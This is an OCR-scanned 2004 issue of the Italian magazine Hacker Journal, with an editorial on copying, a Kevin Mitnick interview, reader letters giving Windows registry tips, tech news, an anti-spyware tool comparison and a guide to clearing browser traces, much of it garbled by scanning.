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hacker (hàk’tjr) 

Anno 3 - N. 57 “Persona che si diverte ad esplorare i dettagli dei sistemi di programmazione 

12 agosto 2004 - 9 settembre 2004 e come espandere le loro capacità, a differenza di molti utenti, 

che preferiscono imparare solamente il minimo necessario." 
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Gli articoli contenuti in Hacker Journal hanno scopo 
prettamente didattico e divulgativo. L'editore declina 
ogni responsabilità' circa l'uso improprio delle 
tecniche che vengono descritte al suo interno. L'invio 
di immagini ne autorizza implicitamente la 
pubblicazizone gratuita su qualsiasi pubblicazione 
anche non della 4ever S.r.l. 

Copyright 4ever S.r.l. 
Tutti i contenuti sono Open Source per l’uso sul 
Web Sono riservati e protetti da Copyright per la 
stampa per evitare che qualche concorrente ci 
freghi il succo delle nostre menti per farci 
del business. 


Q ualche giorno la è arrivata la maiI di Maria Teresa, con dentro un pezzo simpatico 
che avvisa di non innamorarsi degli amministratori dei sistemi da craccare. Ma il 
pezzo non è firmato Maria Teresa, è firmato yopy. Lo leggi bene e capisci che ó Li¬ 
na (bruita) traduzione dall'inglese, chissà di chi, chissà da chi. Chi ha scritto vera¬ 
mente quella cosa è perso da qualche parte nel ciberspazio. Lo stiamo cercando e chissà mai 
se lo troveremo 

Abbiamo trovato Antonio, invece. Ci ha mandato vari articoli da pubblicare. Solo che la fir¬ 
ma ogni volta cambiava Alla fine erano copia-e-mcolla di robe prese da pagine Internet e ri¬ 
girate qui. presso la nostra redazione wireless seminascosta sotto l'ombrellone. 

Maria Teresa e Antonio non hanno fatto niente di male: sono testimoni. Sono nati, o cre¬ 
sciuti. in un'ora che sta segnando la morie del copyright, in cui tutto viene rigirato, digerito e 
rediretto da qualche altra parte, m un girotondo pazzo di terabyte die si rincorrono lungo le 
autostrade di igeo, su per le rotte satellitan. lino ai viottoli accidentati delle nostre connessioni 
via doppino di rame 

Non è più questione di diritto o non diritto di copia La copia è il prodotto principale della 
civiltà digitale. Si sforzano di proteggere i dischi, di proteggere i film, ma è tutto inutile: i bit so¬ 
no fatti per propagarsi L'informazione (i bit) è l'unica cosa che si può veramente creare dal 
nulla I bit di questa frase un secondo fa non c erano. 

Siamo già arrivati al diritto di copia del trash. Le prime sono state le catene di Sant’Anto¬ 
nio. seguito dalle vignette, dai PowerPoint per bancari annoiati, e piano piano dalle pagine 
Web Arrivare al Signore degli Anelli o ai Red Hot Chili Peppers sarà solo questione di tempo 
e se accorgeranno anche loro, i Peppers. 

L'importante sarà godere di tutte le nostre copie, ma sapere essere comunque originali. Il 
fantasyright sarà il nuovo diritto. Altnmenti, perché pensare hacker? Basterebbe pensare qual¬ 
siasi Un hacker vede una copia, la manda in giro, ci si diverte, ma pensa anche a come ar¬ 
ricchirla. Modificarla. Stravolgerla Fare meglio. 

Quando ero piccolo guardavo il mare, come oggi, e i genitori mi prendevano in giro. Cre¬ 
devo che. nuotando abbastanza lontano, avrei raggiunto il punto in cui da una parte c'erano 
le onde che atnvavano alla mia spiaggia e dall'altra parte le onde partivano per la spiaggia op¬ 
posta alla mia. quella che si poteva vedere dalla montagna più alta se c era una bellissima 
giornata 

Guardo ancora il mare e penso che vorrei saper nuotare, o forse navigare, verso il punto 
da dove si crea tutta l’informazione originale che poi viene copiata all'infinito. Sono sicuro che 
ci troverei ben più d uno di questi fantastici centomila originali e irripetibili che danno vita ad 
Hacker Journal. 


thcguilly@hackerjouinal.it 
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Diteci cosa ne pensate di HJ. siamo tutti raggiungibili via e-mail, tramite lettera o messo 
a cavallo... Vogliamo sapere se siete contenti, critici, incazzati o qualunque altra cosa! 
Appena possiamo rispondiamo a tutti, scrivete! 

redazione@hackeriournal.it 
















Jello Bis fra tuona Hai palco Kevin 
Mitnick e stato fortunato, ora ci 
sono oltre mille hacker tenuti in 
carcere senza un processor Kem 
e Jello Bialra si sono intesi imme- 
tliatamente. anche se leposióooi 
politiche di Kevin sono meno estre¬ 
miste di Quelle delrapper! 


In occasione di HOPt è stato possibile discutere per circa 
un’ora con Kevin Mitnick, che ci ha raccontato alcuni 
passaggi della sua esperienza 


“Ma il giudice ha permesso questo?" 

KM: “Il giudice mi odiava. Era così ignorante e confuso da 
quello che leggeva sui giornali che ha detto: “Chiudetelo in 
isolamento e non fatelo telefonare; quello e’ capace di chia¬ 
mare il NORAD e di scatenare una catastrofe nucleare" e lo 
credeva davvero!” 


to danni per 125 milioni di dollari a Motorola; la sua equa¬ 
zione e' stata: Sei entrato in possesso dei sorgenti, i sorgen¬ 
ti non hanno prezzo, allora calcoliamo quanto la Motorola ha 
investito in R&D: totale 125 milioni di dollari. Ma se questo fos¬ 
se stato vero la Motorola avrebbe dovuto (e' una legge fede¬ 
rale) mettere nel bilancio questa perdita e non lo ha fatto! 
Alla fine mi hanno accusato per quattromila dollari di danni: 
ridicolo per avermi tenuto quattro anni e mezzo in carcere, 
ma non ne potevo più, ho firmato l'accordo e sono uscito." 

HJ: "Ed ora?” 

KM: ‘Ora faccio il consulente di sicurezza: faccio tutto quel¬ 
lo che facevo prima ma mi pagano e non rischio di essere 
sbattuto in galera!” 

HJ: " C'éuna morale in questo?" 

KM: "No perché sono stato punito in modo esagerato rispet¬ 
to al crimine che avevo commesso! Però una cosa devo dir¬ 
la non voglio che gli altri imitino quello che ho fatto io nel 
passato; era sbagliato" 

"Hai intenzione di dare la rivincita agli altri a DefCon 
nell' Hacker Jeopardy [Kevin ed il suo team avevano vinto 
lo scorso anno]" 

KM: "Sì mi serve un altra giacca di pelle ed inoltre quest'anno 
sarò un osso duro anche sul bere! [L'anno scorso la squadra 
di Kevin ha totalizzato un punteggio minimo nella fase elimina¬ 
toria dove sui guadagnavano punti ingollando lattine di birra] 


HJ. “Ma la tua sentenza..." 

KM: “Il pubblico ministero mi aveva accusato di avere causa- 


Kevin Mitnick sta presentando 
ora il suo secondo libro. 
Dopo le brutte esperie me 
si e’trasformato 
In un esperto 
di sicurenartacclo 
tutto duello 
che facevo prima 
ma mi pagano 
e non rischio 
di essere sbattuto 
Ingalerar 


HJ: "Kevin, cosa hai provato ad 
essere in carcere? “ 

Kevin Mitnick: “Vedi quando mi hanno 
tenuto per mesi in isolamento e' stato veramen¬ 
te brutto. Vivevo per 23 ore e mezza in una cella minuscola 
e poi venivo incatenato mani e piedi e portato da solo in una 
cella aperta, poco più grande della cella in muratura, dove tra¬ 
scorrevo la mezz'ora d'aria. Non vedevo nessuno e venivo 
incatenato anche per andare a fare la doccia. Certo questo 
ha evitato problemi con gli altri carcerati, visto che non ho 
mai visto nessuno, ma ha rischiato di minare la mia salute 
mentale" 
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Dove posso tro¬ 
vare il codice 
sorgente di un 
sistema di 
sys/log del firewall di Linux? 

La domanda sembrerà stupida ma 
non sono esperto di Linux e devo 
studiare il codice sorgente di tale 
sistema, ma non sono riuscito a tro¬ 
varlo da nessuna parte. 

Michele Menichelli 

Caro Michele, 

non esistono domande stupide. Nel 
99 per cento di casi, quando si 
parla di Linux, trovi il codice sor¬ 
gente insieme al programma vero e 
proprio, sullo stesso sito. Per 
esempio, il sistema di intrusion 
detection Snort 

(http://www.snort.org) offre sia i 
binari precompilati che il codice 
sorgente (http://www.snort.org/ 
source.html). Più in generale, su 
http://www.linux.it e http://www. 
Iinux.org puoi trovare codice, docu¬ 
mentazione e supporto. 


OTTIMIZZARE 

LA GESTIONE DELLA MEMORIA 
IN WINDOWS 


Gentile redazione, 

Ho notato che se uso Windows a 
fondo spesso il disco inizia a girare e 
le operazioni rallentano. C'è qualco¬ 
sa che posso fare? 

HardOK 

Ciao HardOK, 

Se il tuo computer ha una buona 
quantità di RAM installata (almeno 


256 mega, meglio 512) puoi prova¬ 
re a modificare il Registro di 
Windows. Fai partire il Registro da 
Start -> Esegui -> regedit e vai alla 
chiave [HKEY_LOCAL_MACHINE\ 
SYSTEM\CurrentControlSef\Control\ 
Session Manager\Memory 

Management]. 

Il valore DisablePagingExecutive 
evita che i programmi e gli altri file 
eseguibili di Windows XP usino il 
disco rigido come memoria virtuale 
quando si trovano a corto di RAM. 
Di suo è a zero e devi impostarlo a 
1. Attenzione, perché se lanci trop¬ 
pi programmi, e questi saturano la 
RAM a disposizione con le loro 
richieste, invece che un beneficio 
avrai un deciso peggioramento 
delle prestazioni. 



I DISCHI A PAGAMENTO 
SI COMPRANO... 


Sono in possesso di un CD-ROM di 
sfondi vari; alcuni di questi sfondi si 
aprono normalmente, mentre per 
altri è previsto un codice che si ottie¬ 
ne componendo numeri telefonici. 
Aprendo il CD-ROM ho notato che 



c'è Viewer32 con il quale si aprono 
queste foto e poi c’è anche un file 
chiamato code, aprendo il quale con 
Word appaiono simboli in cinese e 
niente altro. Vi chiedo: è possibile 
trovare questi codici per aprire le 
foto in formato Jpeg? 

Roberto 

Caro Roberto, 

sì: è possibile. Comprando gli sfondi, 
oppure indovinando i codici. A dire la 
verità... con tutti gli sfondi che si tro¬ 
vano gratuitamente in Internet, chete 
ne fai di quelli su CD? 


k 


OUTLOOK SENZA SPLASH 


Cara redazione di HJ, 

Il mio Outlook parte molto più lenta¬ 
mente di prima. C'è un qualche 
modo per velocizzarlo? 

3V3 

Cara 3V3, 

devi agire sul Registro di Windows 
(menu Start, Esegui e scrivi rege¬ 
dit). Dal menu Modifica, scegli 
Trova e cerca la stringa {FB7199AB- 
79BF-11 D2- 

8 D 9 4 - _ 

0000F875C541). 

Duando l'hai tro¬ 
vata, clicca sul 

segno + e vedrai _ 

apparire sulla 

destra le chiavi lnProc32 e 
LocalServer32. Clicca con il tasto 
destro del mouse sulla prima chia¬ 
ve e cancella i Dati Valore dalla 
finestra Modifica Stringa. Ripeti 
l’operazione anche per l'altra chia¬ 
ve e Outlook dovrebbe riprendere 
velocità. È una cosa che accade 
spesso quando si disabilita o si 
rimuove MS Messenger. 
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ANTIPASSWORD DA FILM 


Carissimi di HJ, 

vi scrivo per chiedervi se potete indi¬ 
carmi qualche programma magari in 
italiano per trovare tutte le password 
di questo mondo come nei film, dove 
si vede una specie di countdown di 
tutte le lettere e i numeri e alla fine, 
sorpresa, ecco la password. 

Adriano Carenza 



Carissimo Adriano, 
i film sono finzione, non realtà. Un 
programma vero per trovare pas¬ 
sword non spreca tempo di elabora¬ 
zione in effetti speciali e, oltretutto, 
le password non vengono trovate un 
carattere per volta. 

Se cerchi programmi per recupera¬ 
re password ne esistono numerosi, 
per esempio quelli di 
http://www.lostpassword.com/. Se 
vuoi un po’ di effetti speciali ti con¬ 
sigliamo una eccellente simulazio¬ 
ne hackeristica come Uplink 
(http://www.uplink.co.uk). 


TROVARE LE CARTELLE 
INVISIRILI SU WINDOWS 


Ho il sospetto che sul mio computer 
ci siano installati file e cartelle non 
visibili. Naturalmente parlo di malin¬ 
tenzionati che a mia insaputa voglio¬ 
no controllarmi con programmi 
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appositi. Come fare per capire se il 
sospetto è fondato? Potete dirmi 
quali programmi riescano a sblocca¬ 
re l'invisibilità delle cartelle? 

Nazario! 

Ciao Nazario! 

Prova per esempio i programmi 
visibili su http://www.shareware- 
connection.com/titles/mark.htm e 
naturalmente segui HJ, perché par¬ 
liamo proprio su questo numero di 
file invisibili in Windows e conti¬ 
nueremo a farlo. Dai anche un’oc¬ 
chiata a Empty Temp Folders 
(http://www. serbi.info/cookie.htm), 
che non risolve il problema del 
software malizioso ma ripulisce 
alla grande il PC da tanti file che 
sono un problema per la privacy. 


STUDIARE PROGRAMMAZIONE 
MA SU INTERNET 


Ho 18 anni e ho conosciuto il mondo 
degli hacker. Sto leggendo molti testi 
scaricati su siti hacker e ovviamente 
anche il vostro giornale e nelle mie 
letture pomeridiane non studio per 
leggere la vostra rivista, ma vorrei 
conoscere un hacker dal vivo; come 
posso fare? Sapete poi consigliarmi 
un buon libro di programmazione? 

Mirko 

Caro Mirko, 

di hacker dal vivo ne hai incontrati 
un sacco... solo che non lo sapevi! 






Studia (non 
solo i testi 
hacker, anche 
quelli scolastici) e vedrai che 
riuscirai anche a saperlo. Non ti 
consigliamo nessun libro, ma 
Internet. Per esempio, puoi impa¬ 
rare a programmare in Python sem¬ 
plicemente facendo riferimento a 
http://www.python.org. Se vuoi 
cominciare da qualcosa in italiano, 
già leggendo http://net.supereva. 
it/aleax/Python/ltaPythTut. htm?p 
impari le cose essenziali di Python. 
Un po’ di intraprendenza e puoi fare 
lo stesso per qualunque linguaggio. 


DOVE SPIARE 
EE NON FARSI SPIARE) 


Gentile redazione, 

mi ha molto incuriosito il vostro artico¬ 
lo sulle tecniche di pedinamento e vor¬ 
rei sapere dove posso trovare altro 
materiale del genere su internet per 
quanto riguarda le tecniche delle spie... 

Roberto 

Gentile Roberto, 

un primo punto di partenza è 
Spynet, http://www.spynet.has.it/. 
e poi l’esperienza sul campo. Prova 
a pedinare un amico (con cui ti sei 
messo d’accordo prima). Lui deve 
scoprire se e quando è pedinato; tu 
cerchi di riuscirci e non farti scopri¬ 
re. Vedrai che imparerai alla svelta 
cose che non è la stessa cosa leg¬ 
gere sulle riviste. 























































































■ FACCIAMOCI 
UN ROBOT 

U niamo un GameBoy Advanced con 
un po' di pezzi di lego, aggiungia¬ 
mo un modulo WiFi, qualche sensore 
e un po’ di software ed ecco pronto un 
bel robot, capace di andare in giro da 
solo ed esprimersi ogni volta che incon¬ 
tra un ostacolo, com’è possibile vedere 
all’indirizzo www.charmedlabs.com. 
Con poche centinaia di dollari potrebbe 
essere un ottimo inizio per introdurci 
nell’hacking robotico, che ormai sta 
prendendo piede un po' dovunque. 


O RETTIFICA DOVUTA 

S ul numero HJ 56 nella sezio¬ 
ne news con il titolo "UN 
BUCO NE CHIAMA UN'ALTRO E 
UN'ALTRO E...” abbiamo pubbli¬ 
cato una notizia ricavata da una 
e-zine informativa e per errore 
non ne abbiamo segnalato i rife¬ 
rimenti. Eccoli: 

News di Salvatore Aranzulla, pre¬ 
sa da www.zeusnews.it. 

Ce ne scusiamo con l'autore e 
la redazione. 


3 PRONTO PER COMBATTIMENTI URBANI □ 



A lla Carnegie Mellon, università 
americana tra le più famose, 

hanno studiato e prodotto un robot ad 
uso militare, pra¬ 
ticamente indi¬ 
struttibile e capa¬ 
ce di spiare tutto 
quello che trova 
intorno a sé, ritra¬ 
smettendo le 
immagini al cen¬ 
tro di controllo. 

L'hanno battezza¬ 
to "Dragon Run- 
ner” e progettato 
per i combatti¬ 


menti urbani. In pratica va avanti in 
vedetta e riferisce tutti i pericoli ai sol¬ 
dati che seguono. È costruito per con¬ 
tinuare a proce¬ 
dere anche se 
incontra ostacoli, 
si ribalta, viene 
aggredito... Non 
per nulla l'hanno 
recentemente 
spedito in Iraq, il 
suo primo campo 
di battaglia, dopo 
due anni di svi¬ 
luppo in laborato¬ 
rio. 


3 GU UCCELU GUARDONI □ 


I l progetto 
U r b a n 
Eyes del¬ 
l'inglese 
Marcus 
Kirsch e 
dell’irlan¬ 
dese Jussi 
Angesleva 
ha vinto il 
terzo pre¬ 
mio della 
gara Fused Space (www.fusedspa- 
ce.org). Si tratta di una gara interna¬ 
zionale per l'applicazione di nuove tec¬ 
nologie aN'interno di spazi pubblici e i 
due sono entrati nella classifica degli 


eletti con un progetto che prevede di 
fare ingoiare ai piccioni del mangime 
RFID. Ovvero contenente un economi- t 
co microemettitore a radiofrequenza 
che fa scattare la ripresa di alcune 
telecamere posizionate nei luoghi dove 
normalmente i piccioni vanno a posar¬ 
si. Inutile dire che su un server vengo¬ 
no raccolte tutte le immagini suddivise 
per piccione o per posizione della tele¬ 
camera. Pericolo per i piccioni? 
Nessuno, dopo 12 ore il dispositivo vie¬ 
ne espulso per vie naturali. 

Pericolo per noi? Beh, è sicuramente 
un altro modo di guardare alla città, 
ma dipende dove ci posizioneranno le 
telecamere... 



3 ATTENTI! IL CELLULARE UCCIDE □ 


N aturalmente è una bufala, ma in 

Nigera sta diffondendosi in questi 
giorni la fasulla notizia che se si rice¬ 
ve una telefonata da un dato numero, 
si muore immediatamente. Notizia che 
fa il paio con quella che si era diffusa 
qualche tempo fa, sempre in Nigeria, 
tale per cui se capitava di stringere la 
mano ad alcune persone si sarebbe¬ 
ro persi immediatamente gli organi 
genitali. 

Sembra impossibile che qualcuno ci 
creda, ma in questi giorni a Lagos gli 
operatori telefonici hanno il loro bel 
daffare a creare campagne di rassi¬ 
curazione agli utenti di cellulare, per¬ 
ché si convincano che di spam telefo¬ 
nico non si muore. Cosa non fa la 
superstizione... 
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3 ASER VERSO LA LUNA 


T rentacinque anni fa, quando gli 
americani raggiunsero il nostro 
satellite, lasciarono sulla superficie 
lunare una specie di specchio per un 
esperimento che continua tuttora. Dal¬ 
l’osservatorio McDonald, in Texas, vie¬ 
ne regolarmente “sparato” un raggio 
laser verso la Luna e, misurando quel 
poco che torna indietro (pare che sia 
nell'ordine di qualche fotone), riuscia¬ 
mo a calcolare la distanza esatta al cen¬ 
timetro, momento per momento, tra noi 
e il nostro satellite. Lo scopo è quello 
di calcolare con precisione l’effetto del¬ 
la massa lunare sul nostro pianeta e 
per studiare alcuni fenomeni gravitazio¬ 
nali previsti ma non ancora dimostrati. 
In questi giorni il laser è stato sostitui¬ 
to con un modello più recente, più 


potente e più preciso. Ora sapremo la 
distanza reale con una precisione al mil¬ 
limetro. Utile, no? 



O NASCE GONEME CONTRO GNOME □ 


A ll'indirizzo www.akcaagac. 

com/index^goneme.html trovia¬ 
mo tutto quello che ha da dire con¬ 
tro GNOME uno degli ex progettisti. 

In sostanza vuole tornare alle origini e 
disapprova le ultime scelte di design 
dell'interfaccia desktop open-source 
originale. Per cui invita la comunità 
internazionale a sviluppare, basando¬ 
si sul nucleo esistente di GNOME, una 
nuova interfaccia utente più rispettosa, 
secondo lui, dei canoni che erano alla 
base del progetto free software origi¬ 
nale. Speriamo che queste divisioni 
all’Interno della comunità open source 
non siano l'inizio di un fallimento, in un 


momento già difficile per la comunità 
intera, che vede gli stati impegnati a 
emanare leggi riguardanti la brevetta¬ 
bilità del software. Ma questo è un altro 
capitolo. 



O SESSANTA FIRMANO CONTRO P2P □ 



S ono oltre sessanta gli artisti che 
hanno firmato una petizione con¬ 
tro il file sharing e tra questi Liga- 


bue, Al Bano. Ramazzotti, 
Morandi, Piotta e Bobby 
Solo. Gongolano le case 
discografiche, un po' meno 
gli utenti. Anche perché gli 
esempi contrari non man¬ 
cano e pare che abbiano 
un meritato successo. E' il 
caso di Elio e le storie tese 
che permettono di scarica¬ 
re tutto quello che si vuole, 
di recente o meno, pagan¬ 
do solo 30 euro all'anno. E 
il decreto Urbani? Per ora 
le modifiche promesse 
sono in attesa di approvazione. Chis¬ 
sà se passata l'estate, le crisi, le vota¬ 
zioni, le revisioni, le... 



■ BASTA CON 
LE PATACCHE 

W inwatch, un’azienda svizzera di 
orologi da polso, ha pensato di 
inserire un chip 
trasmettitore 
Hitachi diretta- 
mente all'inter¬ 
no del vetro del¬ 
l’orologio. Così 
non ha modifi¬ 
cato nulla della 
meccanica del¬ 
l'orologio, ma 
questo adesso 
possiede la non 
banale caratte¬ 
ristica di poter 
essere identificato con precisione... 
svizzera e quindi praticamente sicuro 
contro i furti. 



■ MINUSCOLO CHIP 
TRASMETTITORE 

A bbiamo tutti presente la sacca del¬ 
la fleboclisi che si svuota inesora¬ 
bilmente e noi siamo lì impotenti, o 
perché siamo i degenti o perché vedia¬ 
mo che serve al nostro parente ricove¬ 
rato, ma non viene nessuno a cambiar¬ 
la. Perfettamente inutili i campanelli di 
richiamo alle infermiere. Si aspetta 
comunque e l'attesa, in certe situazioni, 
sembra interminabile. 

Ora non sarà più così. Perlomeno negli 
ospedali che adotterano WiFi e, in par¬ 
ticolare, le sacche dotate di un sensore 
sviluppato da Sharp Healthcare che lan¬ 
cia segnali codificati al computer cen¬ 
trale, il quale avverte del problema la 
caposala. E si sa, quando intervengono 
le caposala c’è poco da ridere... 


S'zo. 0.4 x 0 4 rvun 
Raflio r «aquency 2.45 GHz 
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abbiamo provato boa programmi gra¬ 
tis tra i piò famosi per elimioare i 
programmi io Pesi a orati ila lòfi adorna 


' MALWARE 


| 

I Contrazione di malicious 
I Osoftware, software svilup- . 

I pato per fare danni a chi lo , 

I usa. Comprende, virus,worm, 

I I trojan e anche lo spyware, il * 
I software che carpisce informa- ✓— 
j V zioni di un utente senza il per- 
I messo di quest’ultimo. 


n po' di Windows ne capia¬ 
mo e sappiamo che è facile 
prendersi un virus o qualche 
programma ostile e fastidio¬ 
so, se non ci si comporta 
con prudenza e attenzione. 
Ma quanto è effettivo il pericolo? Ce lo 
siamo chiesti e abbiamo fatto una prova, 
destinando un computer al ruolo di vitti¬ 
ma. Lo abbiamo inviato su Internet a fare 


▲ Ci piacErebbe che fosse 
più radicale nelle sue 
decisioni,ma Spybot lauora 
comunque bene e indiuidua 
quello che ua indiuiduato. 


cose che non si devono fare (tipo regi¬ 
strarsi presso siti porno - non per il sito 
in sé, ma per quello che fanno con la 
nostra mail - oppure scaricare incauta¬ 
mente da siti che promettono meraviglie 
gratis e così via) e poi abbiamo messo 
alla prova due programmi. Spybot e Ad- 
aware, tutti e due gratuiti. Come antivi¬ 
rus avevamo McAfee VirusScan Profes¬ 
sional Edition e anche la toolbar di Goo- 
gle per eliminare il più possibile le pub¬ 
blicità indesiderate. Per il resto, ci siamo 
detti, una mano nel registro, quando ser¬ 
ve, sappiamo mettercela. 


Per quantità 

Se si ragiona per numeri nessuno bat¬ 
te Ad-aware. Ha trovato 47 tra file dub¬ 
bi e voci di registro equivoche nel tempo 
che Spybot ne ha viste cinque. In com¬ 
penso Spybot ha individuato tutti i pro¬ 
grammi realmente pericolosi, compreso 
uno che pensavamo di avere eliminato a 
mano. 

Una cosa che non ci è piaciuta di Ad- 
aware è che il suo file di riferimento 



era poco aggiornato, vecchio più un 
mese. Questo non è un bene, perché le 
banche dati sul malware si arricchisco¬ 
no di continuo e ci vuole aggiornamento 
costante, come con i virus. Invece Spybot 
era fresco di aggiornamento da neanche 
una settimana. 


Per fermezza 

È importante vedere che provvedi¬ 
menti prendono i programmi antimal- 
ware contro le minacce potenziali. 
Spybot ha individuato i problemi più gra¬ 
vi ed è anche il programma più pruden- 
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j Rd-aware localizza 
codice ooo gradito in Kazaa. 
Una scena che si ripete 
molto spessa. 

te nel suggerire se cancellare un file o 
meno. Sarebbe meglio se come preim¬ 
postazione fosse possibile autorizzare 
la cancellazione, cosa che si può fare in 
fase di configurazione. Ad-aware offre 
molti più candidati alla cancellazione, ma 
trova anche vari file che in realtà 
sono più sicuri. 


I sistemi di help sono ambedue 
validi, anche se quello di Spybot 
appare un po' più datato. L’ultima 
versione di tutti e due i programmi 
offre funzioni di recovery che per¬ 
mettono di tornare indietro se ci 
sono problemi nell'eliminazione di 
un oggetto. Naturalmente, se si 
usano le opzioni avanzate e si per¬ 
mette a questo o quel programma 
di smanettare nel registro, è possi¬ 
bile fare danni irreparabili. Si chia¬ 
mano opzioni avanzate proprio 
perché chi le usa sa quello che fa! 
Spybot contiene anche una inte¬ 
ressante opzione di immunizzazio¬ 



ne dei browser Opera e Internet Explo¬ 
rer, che attiva funzioni antimalware pro¬ 
prie dei due programmi, normalmente 
inattive. 


Cose che non ci 
sono piociu 


- . 

Poco. Spybot offre una opzione di bac- 
kup del registro di Windows, ma quan¬ 
do l'abbiamo provata non ha funziona¬ 
to. Ad-aware si comporta bene, a parte 
creare un'icona sulla scrivania e una 
voce nel menu Start senza che glielo 
chiediamo. 

Conclusione 


Il nostro verdetto è: pareggio. Spybot 
cattura i pericoli maggiori nel giro di un 
clic o due del mouse; Ad-aware richie¬ 
de forse un po piu di attenzione ma ese¬ 
gue una pulizia più approfondita. Occu¬ 
pano poco spazio su disco, si aggiorna¬ 
no in fretta via Internet e sono gratuiti. 
Per quanto valgono, noi pensiamo di 
tenerli tutti e due, a lavorare di squadra. 

• > Nyarlathutep 

nyarlathofep@hackerjournal.it 



▲ Il bello di questi programmi 
è la loro precisione nel riportare 
ciò che trouano nel computer. 





• AD-AWARE 6 PERSONAL 

Buono: Acchiappa un numero incredibile di 
minacce malware e, di serie, permette di 
decidere come comportarsi per ognuna. A 

Cattivo: Potrebbe essere più aggressivo nel- 
’identificare i file da cancellare, ha aggior¬ 
namento poco frequenti e mette icone e 7 
comandi in scrivania e menu Start senza per- tu00 
messo. 

j Dove gratis per uso personale a 
http://www.lavasoftusa.com. 



à SPYBOT ■ SEARCH & 

DESTROY 1.3 > 

I Buono: individua e sistema i pericoli peggio- 
ri per il principiante e offre buone opzioni 
avanzate per chi è più bravo. 

rrr 

Cattivo: L’help è poco aggiornato e, come è . 
preconfigurato, tende eccessivamente a con- / 

% 


o 


servare i file dubbi. 


gratis a http://www.safer- 
networking.org. 
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Bave sana, che cosa tacco, parche saaa icvisibili 
e soprattutto corno arrivarci! 




ALLA FACCIA DEL REGISTRO 

S Secondo Microsoft il Registro di sistema 
è un archivio centrale che contiene uni¬ 
camente informazioni sulla configurazione 
di Windows e dei programmi Balle. Tanto 
per iniziare, contiene anche informazioni sugli 
ultimi URL che abbiamo digitato in Internet 
Explorer, per la precisione quelli che il brow- 
ser ricorda per l'autocompletamento auto¬ 
matico, Si possono cancellare anche loro, per 
fortuna. Apriamo il Registro di sistema da 
Start -> Esegui -> regedit. Le chiavi di regi¬ 
stro che ci interessano sono in 
HKEYJJSERS/Default/Software/Microsoft/Int 
ernet Explorer/TypedURLs/ e HKEY_CUR- 
RENT_USER/Software/Microsoft/lnternet 
Explorer/TypedURLs/. 


bbiamo già parlato In pas 
sato dei file index.dat che 


Microsoft nasconde in 


Windows in modo che non 


possano essere visti se 
non da DOS. Questi file con 


tengono la nostra storia di browsing e 
altre informazioni che Microsoft, birbo¬ 
na, non vuole che vediamo. I file index.dat 
si possono trovare in 


c:\inindoius\history\history.ie5\in 

deH.dat 

c:\utintìou;:.\tempor~1\cantent.ie5 
\indeK.dat t T* G-LI 


In certi casi i file potrebbero avere il 
nome alternativo di mm256.dat e 
mm2048.dat. e trovarsi in 


c:\iDindows\tempor~ 1\ Jfc-V H 
c:\iuindoLus\history\ 





























MIO HACKING 


Dipende da come è impostato il com¬ 
puter e, per esempio, che cosa c'è 
nel file autoexec.bat. 

Cercando in giro per il sistema è possi¬ 
bile trovare qualche altro file index.dat. 
apparentemente assai meno importante 
per la nostra privacy. 

Chi volesse potrà sbizzarrirsi a individuar¬ 
li nel suo sistema, 


Non è difficile cancellare i file .dat, 
una volta che abbiamo saputo che 

esiston Attenzione: cancellarli signifi¬ 
ca distruggere i file di cache, tempora¬ 
nei. di cronologia eccetera. Facciamolo 
se lo vogliamo fare e se sappiamo che 
cosa significa; non facciamolo tanto per 
provare. 

Riavviamo il computer e mentre ripar¬ 
te, teniamo premuto il tasto F8 ed entria¬ 
mo nella modalità provvisoria con prompt 
dei comandi. 

Così facendo possiamo lavorare da DOS 
e impartire comandi che altrimenti non 
raggiungerebbero il bersaglio. I computer 
con il vecchio Windows ME hanno biso- 



li 



Un segreto banale per non ritrouarsi file nascosti nel sistema: 
usare un browser Uiuerso da Enplorer. Per esempio Mozilla. 


gno di fare il boot da un floppy per entra¬ 
re in modalità Prompt dei comandi. 


C:\IDIN001DS\SMRRTDRU (carica 
smartdriue per ueiocizzare le 
cose) 

C0\ 

DELTREE/V TEMP (cancella i file 
temporanei) 

CD LUINDOUiS 

DELTREE/V COOKIES (cancella i 
cookie) 

DELTREE/V TEMP (cancella i file 
temporanei) 

DELTREE/V HISTORV (cancella la cro¬ 
nologia) 

DELTREE/V TEMPOR ~ 1 (cancella la 
cache) 


Se l'ultimo comando non funziona si 
può provare: 


CO\lDINDODJS\flPPLIC~ 1 
DELTREE/V TEMPOR-l 


Se non funziona neanche questo, c’è 
un'altra alternativa: 


CD\LUINDOUJS\LOCRLS" 1 
DELTREE/V TEMPOR-1 


In caso di problemi, si tenga conto 
che alcune versioni di Explorer cam¬ 


biano la posizione in cui sono regi¬ 
strati i dati. I file potrebbero per esem¬ 
pio trovarsi in \windows\profiles\%uten- 
te%\, oppure in \windows\content\, o altro. 
Ricordiamo anche che su un computer 
molto usato si può trovare tanta cache e 
che quindi certi comandi potrebbero 
richiedere diverso tempo. I comandi DOS 
non mostrano barre di progresso o altri 
indicatori, per cui non è il caso di preoc¬ 
cuparsi se non vediamo messaggi dal 
sistema per un po'. Teniamo presente che 
Windows ricrea comunque i file .dat al 
primo riavvio e quindi non dobbiamo 
meravigliarci di ritrovarli li. L'importante 
è che saranno vuoti. 


DIMMI CHE BROWSER USI 

P raticamente tutti i browser che non seno 
Internet Explorer sono molto più traspa¬ 
renti e informativi rispetto a cache e cro¬ 
nologia Su Mozilla (http://www.mozilla.org), 
Opera (http://www.opera.com) e tutti gli altri 
possibili candidati basta dare un comando 
da menu per cancellare tutto. 

È solo Explorer a creare dati personali diffi¬ 
cili da trovare. Conclusione: se non siamo 
obbligati da qualcosa o da qualcuno a usa¬ 
re Explorer, e teniamo alla privacy, usiamo 
un altro browser, 











BOT 



Ma ci sana anche nuelle 
già fatte, che attendono 
unicamente en padrone 
in gradn di insegnare 
loro 


/ y/f/jmwA 

m fi 

''jrr . 


$$$ IL TURING PRIZE $$$ 


S e qualcuno riuscisse a creare un pro¬ 
gramma capace di sostenere vera¬ 
mente una conversazione seria con un 
essere umano, passerebbe il cosiddetto 
test di Turing e potrebbe vincere il Turing 
Prize, messo in palio annualmente per 
l’ammontare di centomila dollari. Il premio 
principale non è ancora stato assegnato. 
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termine è nato negli anni Tren¬ 
ta. Oggi un bot è per noi un pro¬ 
gramma intelligente o, meglio, 
che sembra tale, capace di fare 
cose da solo come andare a caccia di 
indirizzi da spammare oppure di chiac¬ 
chierare in chat. 


Program 

piccolo 


Per chi non 
voglia, esiste Runabot (http://www.runa- 
bot. com). È un motore di bot già pronto 
per creare personalità artificiali da man¬ 
dare in chat sulla rete AIM. Per inventar¬ 
ci un bot basta andare sul sito e clicca¬ 
